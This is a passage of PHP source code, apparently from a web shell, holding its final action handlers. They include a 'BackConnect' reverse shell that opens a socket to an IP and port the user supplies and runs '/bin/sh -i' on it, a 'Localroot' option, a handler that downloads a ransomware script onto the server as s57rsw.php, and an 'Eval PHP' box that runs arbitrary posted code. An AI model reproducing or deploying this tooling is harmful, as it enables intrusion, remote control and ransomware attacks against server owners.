734.     }
735.    
736.   }elseif ($_GET['jshell_act'] == 'lc') {
737.     $js->Jtitle('Localroot');
738.     $js->Jshell_act('lc');
739.   }elseif($_GET['jshell_act'] == 'net')
740.   {
741.     $js->Jtitle('BackConnect');
742.     $js->Jshell_act('bc');
743.     if(isset($_POST['sbmt']))
744.     {
745.       $sock=fsockopen($_POST['ip'],$_POST['port']);
746.       if($sock)
747.       {
748.         echo "<center>Connection estabilished~</center> <br>";
749.       }else{
750.         echo "<center>Connection failed</center><br>";
751.       }
752.       $js->cmd("/bin/sh -i <&3 >&3 2>&3");
753.     }
754.   }elseif($_GET['jshell_act'] == 'rans')
755.   {
756.      $js->Jtitle('Ransomware ');
757.     if($js->Jcaller($js->src_link['ransomware'],'s57rsw.php'))
758.     {
759.       echo "<center><b>Successfuly called <a href='s57rsw.php' target='_blank'>s57rsw.php</a> !!</b><br/>";
760.     }else{
761.       echo "request failed";
762.     }
763.   }elseif($_GET['jshell_act'] == 'php')
764.   {
765.     $js->Jtitle('Eval PHP');
766.    
767.     if(isset($_POST['sbmt']))
768.     {
769.       echo "<hr>";
770.       @eval($_POST['code']);
771.       echo "<hr>";
772.       $js->Jshell_act('php');
773.     }else{
774.       $js->Jshell_act('php');
775.     }
776.   }
777. }
778. ?>